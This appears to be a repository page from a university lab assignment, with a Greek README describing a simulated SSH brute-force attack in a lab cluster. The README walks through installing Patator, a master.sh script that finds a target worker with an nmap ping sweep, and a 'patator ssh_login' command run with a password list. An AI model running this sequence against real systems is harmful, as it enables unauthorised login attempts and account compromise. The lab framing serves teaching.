You can not select more than 25 topics Topics must start with a letter or number, can include dashes ('-') and can be up to 35 characters long.
AndreasNefeli 9a9d183911 Update '2. SSH Brute Force/README.md' 4 years ago
..
README.md Update '2. SSH Brute Force/README.md' 4 years ago
master.sh Upload files to '2. SSH Brute Force' 4 years ago
passwords.txt Upload files to '2. SSH Brute Force' 4 years ago

README.md

SSH Brute Force

Για την προσομοίωση της επίθεσης SSH Brute Force, επιλέξαμε να χρησιμοποιήσουμε το Patator.

Το Patator είναι ένα εργαλείο, γραμμένο σε python, για Brute Force επιθέσεις, με εξαιρετικά μεγάλο πλήθος modules και πολλές ευέλικτες ρυθμίσεις.

Εγκατάσταση του Patator

Όπως και σε όλα τα ερωτήματα της εργασίας, κάθε υλοποίηση γίνεται σε ξεχωριστό φάκελο. Επομένως, η εγκατάσταση θα γίνει εντός του SSH Brute Force directory. Ως kali users, έχουμε ήδη στη διάθεσή μας το συγκεκριμένο εργαλείο. Σε κάθε άλλη περίπτωση ακολουθούμε μόνο την πρώτη φορα χρήσης του τα εξής βήματα:

  1. sudo apt update
  2. sudo apt upgrade -y
  3. sudo apt install patator -y
  4. git clone https://github.com/lanjelot/patator.git

Αφού ολοκλρωθεί η εγκατάσταση, συνδεόμαστε στον master, από τον οποίο θα υλοποιηθεί και η επίθεση.

sudo ../swarmlab-sec/install/usr/share/swarmlab.io/sec/swarmlab-sec login

Σημείωση: Προκειμένου να μάθουμε ποια εντολή πρέπει να χρησιμοποιήσουμε για τη συγκεκριμένη επίθεση, ανατρέξαμε στο documentation της patator, μέσω των εντολών:

1. python patator.py 2. python patator.py ssh_login (καθώς αυτή είναι η επίθεση που μας ενδιαφέρει.)

Έπειτα, δημιουργήσαμε και τρέξαμε ένα script master.sh, το οποίο περιέχει όλες τις εντολές για την υλοποιήση της επίθεσης. ./master.sh

master.sh

  • H my_ip περιέχει την ip διεύθυνση του master.

    my_ip=$(ifconfig eth0 | grep 'inet' | cut -d: -f2 | awk '{print $2}')

*H network περιέχει την ip του δικτύου, την οποία χρησιμοποιούμε για να βρούμε την ip του worker, στον οποίο θα επιτεθούμε.

network=$(echo $my_ip | sed 's/.[0-9]$/.*/')

  • Στη μεταβλητή worker περιέχεται η ip του πρώτου worker, όπως αυτός υπάρχει στο σμήνος. Εάν θέλουμε να επιτεθούμε σε κάποιον άλλο worker, θα βάλουμε το επιθυμητό ψηφίο στην παράμετρο grep worker_ψηφίο.

    worker=$(nmap -sP $network | grep worker_1 | awk '{print $NF}' | tr -d '()')

  • Με την ακόλουθη εντολή εκτελείτε η επίθεση.

    patator ssh_login user=$my_ip password=FILE0 0=passwords.txt host=$worker #emfanizei kai tis apotyximenes prospatheies #patator ssh_login user=$my_ip password=FILE0 0=passwords.txt host=$worker -x ignore:mesg='Authentication failed.' #emfanizei mono tin epithesi ston kwdiko pou isxuei

REFERENCES

  1. https://pentestit.medium.com/brute-force-from-ssh-to-web-dc0e986583ae
  2. https://en.kali.tools/?p=147
  3. https://tools.kali.org/password-attacks/patator
  4. https://github.com/lanjelot/patator
  5. https://github.com/lanjelot/patator/blob/master/patator.py